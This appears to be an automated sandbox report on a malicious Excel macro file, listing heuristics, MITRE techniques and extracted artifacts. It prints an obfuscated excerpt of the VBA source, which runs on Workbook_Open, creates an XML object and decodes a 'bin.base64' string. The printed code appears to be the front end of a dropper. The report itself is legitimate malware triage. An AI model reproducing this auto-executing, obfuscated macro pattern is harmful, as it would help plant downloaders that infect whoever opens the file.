Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1047 WMI
The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code as soon as the document is opened. The VBA code uses CreateObject and Shell() calls, indicating an attempt to download and execute a secondary payload. The obfuscated nature of the script and the presence of a Workbook_Open macro suggest downloader or dropper functionality.
Heuristics (6)
- VBA project inside OOXML (medium, 4 related findings) [OOXML_VBA]: Document contains a VBA project; VBA macros present
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Workbook_Open macro (high) [OLE_VBA_WBOPEN]: Workbook_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12257 bytes |

SHA-256: fad669978dff7e4526816b7d323a9844c5f6af4bcd3a2fcad37017d4e17ca8ca

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
IpTPSnlJyYH81sEb5q.cOBTj24E9KBIxWN7qEHJ
While 4 = 6058
Dim SorHYhO9rSgEm885H5Iq_AOwOM6mghNbVlCwf34Ak5Wom6eyYRxv6ZJRY53 As String
Wend
Dim JkkZI_DsA4IWN_G As Integer
While 18 = 4209
Dim DmiHRrEMMsbf5atWk_sY_cMjiLc5N4hu As String
Wend
Dim wUFnyuibdVKY As Integer
While 7 = 1682
Dim lfwiIuvNPr_iY9hEMJ8SJpsiSEhyZP4lQw7BX4ubGSc_OfMyKb As String
Wend
Dim MSW2M5wMNC As Integer
While 21 = 2831
Dim L6w_xbQkBfqSYeJzLmRw1rl8BiMXhBN As String
Wend
Dim JnqNKebPwNlwo As Integer
While 18 = 552
Dim u332pWqI4aKdRy7MM3B9PfnrO9TsVegN57KGpTqJS_OLdt2odBhU As String
Wend
Dim ixXMNIlpB7vX37i As Integer
While 15 = 7831
Dim Ulyf3JznKOZLdEnMS6KoFg83fq_HVQ1S As String
Wend
Dim gJfBoeoIrHK8 As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "IpTPSnlJyYH81sEb5q"
Dim u4GmJo2gxMAVl9cnaa7vG3kmLJY36W9yKSKbeVduo7aoa7M7TJ6y8dM2QcZ9N8kYNJIRvAG_6JEJZ6KN7ahuaI1q_SIB5e As String
Dim JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV As String
Dim iYtmxYmOrsWsdc9_1QjoQx_uInInTdZoyZjt6n_8cWjzMxQvB6EDXYPuY9bIN85LQq3D2NCKKlK3LIfTUWkWXVOYHyT7J4rdaWge5M3v331vLWg As Integer
Function w6GiWrbapPbwn5_JIqQ4WFnSikhwPB67U9Ei(brchSRFIr1vyXxkdKhj2Z_sOOGWIH1KhGU2GBIkKHKvTTiaPDb7Wn5aV9MQK47A1oLpB5baB6XsMRW4ppF_p3x4L4eHx1YPKJ5oG2XTk_5ZO)
While 21 = 4304
Dim Rqrb6qaG9LA1Ur_eHFVwNIIgCSX75ETTG9HTgvu2x6Ry26Y As String
Wend
Dim AbLHVphpGfJXlQd As Integer
While 18 = 4873
Dim K22osUho8UTd8R1ToE4Wcr77nhQAwVVHjRtY As String
Wend
Dim KLCawMvBKjWPJdR As Integer
JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV = "MsXMl" & "2.dOMDOCumEnt"
While 24 = 6088
Dim q4Ab45AIDg1j8K3ogZWb315ocJ5b84sl1DZoQQdAJB946lwyQ4y As String
Wend
Dim yvBYz8T8s_gKHw As Integer
While 10 = 5389
Dim Ms4tLWO5VPz2AszV_ICD4yxniq6RuAlyyEq33_Dfh3Yuh8 As String
Wend
Dim kFV4WHD3X4NIe As Integer
Dim Y3vXWb2KGzct9FEkJ35YgW7PRNnONsIdOH9_bU7pDo1MSw8QtAkumIbA5eEHwk7Wo9dzFAHy5NU1fr6dPVeLGXzEo7I6Ow
While 1 = 187
Dim Z7ITm_B5A7b9Eee_XCEkuSJXENptLR8m4hEks_Fg5AiI35Pmh39 As String
Wend
Dim HhtEuuMWSQ As Integer
While 15 = 3681
Dim rr9x_fY3OS5gotsAdJ7CJRREdUx9z8zsLmQ1JDzsMoln6j2_UsOCYPEX As String
Wend
Dim X2SrrYBQbK As Integer
Dim Pkg_DonhlHg_17MDWYWB_1LDG2gxD1HY8NuTH719Dxh8X1mwnhj_
While 8 = 6951
Dim TBa2zYTLydpnI3cxlEqwR6f3bQtFAw As String
Wend
Dim mSJtOygc3yq As Integer
While 14 = 325
Dim KajqtqYM4w5jo2WehXgoLKA1VbYlnOGL1EFd5Jri As String
Wend
Dim S2E_qse12R9_U As Integer
While 23 = 4690
Dim Ic9YsTQQwinnrriu3jVp7UTEAIl6gtTOCzqkFDK As String
Wend
Dim zZQfRZU8A6E8rkX As Integer
While 22 = 6341
Dim XwH3WhqTsBMWj2_7nxWfNoyBnoJk_avlnna4bLplG_gdDCuE_8aIS As String
Wend
Dim Hs8EMrW_TQOks5Y As Integer
Set Pkg_DonhlHg_17MDWYWB_1LDG2gxD1HY8NuTH719Dxh8X1mwnhj_ = CreateObject(JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV)
While 28 = 8554
Dim EdZGtWHFS7k4DkA_lQher5U97NCtNNaSyp3b_Ahq9kmHlxRcSQmSJYqJHa As String
Wend
Dim IeTX1_ePDWq As Integer
While 10 = 6700
Dim g9jr1eFPLUH5iZ7kGHY9rSh1CUjsgmTs4uuR As String
Wend
Dim BjR3i36_Aiu8 As Integer
u4GmJo2gxMAVl9cnaa7vG3kmLJY36W9yKSKbeVduo7aoa7M7TJ6y8dM2QcZ9N8kYNJIRvAG_6JEJZ6KN7ahuaI1q_SIB5e = Chr(294 - 196) & Chr(270 - 165) & Chr(213 - 103) & Chr(67 - 21) & Chr(260 - 162) & Chr(147 - 50) & Chr(447 - 332) & Chr(319 - 218) & Chr(310 - 256) & Chr(234 - 182)
While 25 = 5360
Dim cVGnX8MYrod5Vri_X_wnmhgyeXyVcy As String
Wend
Dim bjkxDOL_evf3 As Integer
While 20 = 5888
Dim S5w8LIVDkh7RP5xRG_Hz52K4RhnRwRd_GtMkAgKn_XL4lQgGZ36elp As String
Wend
Dim Zs3nndDPRD6J As Integer
... (truncated)
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 36864 bytes |

SHA-256: 291dc8ff8a1dc0cdaa84bd1e772d6233061a31b88012cfd3966b06e93e99b824

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 long base64-like blob(s).